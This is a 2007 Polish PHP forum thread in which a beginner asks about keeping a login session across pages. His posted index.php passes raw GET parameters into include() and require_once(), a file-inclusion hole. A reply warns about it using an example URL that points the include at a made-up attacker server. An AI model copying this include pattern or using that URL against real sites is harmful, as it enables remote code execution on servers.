Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> panel z logowaniem
arcktick
post
Post #1





Grupa: Zarejestrowani
Postów: 3
Pomógł: 0
Dołączył: 9.01.2007

Ostrzeżenie: (0%)
-----

pisze forum oparte na php i mysql i chcialbym zrobic na nim cos w rodzaju panelu logowania tak jak to na przyklad jest na tym forum zrobione. W tej chwili konstrukcja mojego pliku index.php wygląda nastepujaco:
[PHP] pobierz, plaintext 
  1. <HTML>
  2. <HEAD>
  3. <TITLE>WSPANIALE FORUM</TITLE>
  4. <link rel="Stylesheet" type="text/css" href="style.css" />
  5. </HEAD>
  6. <BODY bgcolor="white">
  7. <TABLE align="center"><TR><TD><IMG SRC="top.jpg"></TD></TR></TABLE><br>
  8. <-----------LOGOWANIE----------------------------------------->
  9. <?php
  10. if(!isset($_GET['Nazwa2']))
  11. {
  12. 	$parowka2="login.php";
  13. 	include($parowka2);
  14. }
  15. if(isset($_GET['Nazwa2']))
  16. {
  17. 	$parowka2=$_GET['Nazwa2'];
  18. 	require_once($parowka2);
  19. }
  20. ?>
  21. <BR><BR>
  22. <a href="index.php?Name=main.php">Wyswietl grupy tematyczne</a>
  23. <!---------------------------srodkowy pas ------------------------------->
  24. <?php 
  25. if(!isset($_GET['Name']))$parowka="main.php";
  26. if(isset($_GET['Name']))$parowka=$_GET['Name'];
  27. include($parowka);
  28.  
  29.  
  30. ?>
  31.  
  32. </BODY>
  33.  
  34.  
  35.  
  36. </HTML>
[PHP] pobierz, plaintext


I spoko moge sie zalogowac.Tylko ze jakakolwiek akcja uruchamiajaca index.php wylogowuje mnie co zreszta jest do przewidzenia bo skrypt wykonuje sie od poczatku. Moje pytanie dotyczy tego czy da sie to jakos rozwiazac przy takim ukladzie index.php ktory zawiera dwa niezalezne includy i czy wogole da sie tak zrobic zeby odczytane przeze mnie przywileje uzytkownika byly globalnie widoczne ( na czas sesji uzytkownika- jest mi to potrzebne przy okreslaniu akcji jakie uzytkownik moze podejmowac).
Chodzi mi o dokladnie taki sam panel logowania jak jest na tym forum.
pozdrawiam i z gory dzieki za kazda sugestie
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi (1 - 3)
Kamil J.
post
Post #2





Grupa: Zarejestrowani
Postów: 51
Pomógł: 0
Dołączył: 29.12.2005
Skąd: Łódź

Ostrzeżenie: (0%)
-----

Sugestia: twój kod to deser dla potencjalnego haxora.

w GET'cie trzymasz całą nazwę includowanego pliku? tzn index.php?nazwa2=page.php

potencjalny haxor wpisze:
index.php?nazwa2=http://serwerhaxora.pl/plik_pozwalajacy_mu_sie_wlamac.php

i co wtedy snitch.gif

zobacz to: Temat: Bezpieczenstwo skryptow php

Co do logowania to najpierw popraw ten kod ^^

Ten post edytował Kamil J. 13.01.2007, 19:50:13


--------------------
Workspace: Ubuntu 8.04, PDT.
Go to the top of the page
+Quote Post
arcktick
post
Post #3





Grupa: Zarejestrowani
Postów: 3
Pomógł: 0
Dołączył: 9.01.2007

Ostrzeżenie: (0%)
-----

tak wiem bezpieczenstwo jest bardzo wazne ale to blad jest do wyeliminowania. moim bole jest w tej chwili to jak zrobic dwa niezalezne includy tak zeby wywolanie jednego nie wywolywalo drugiego

luz poradzilem sobie dzieki zastosowaniu sesji uzytkownika :-)
Go to the top of the page
+Quote Post
Kamil J.
post
Post #4





Grupa: Zarejestrowani
Postów: 51
Pomógł: 0
Dołączył: 29.12.2005
Skąd: Łódź

Ostrzeżenie: (0%)
-----

Wytłumacz to jakoś dokładniej, bo w tym pierwszym poście to nic nie rozumiem.

Mówisz o jakiś przywilejach/logowaniach, a pokazujesz kod który jest odpowiedzialny na wyświetlenie danej treści. ocb?

Pozdrawiam Kamil


--------------------
Workspace: Ubuntu 8.04, PDT.
Go to the top of the page
+Quote Post
« Następny starszy · PHP · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Linearny+ · Przełącz na: Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 22.08.2025 - 00:36
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn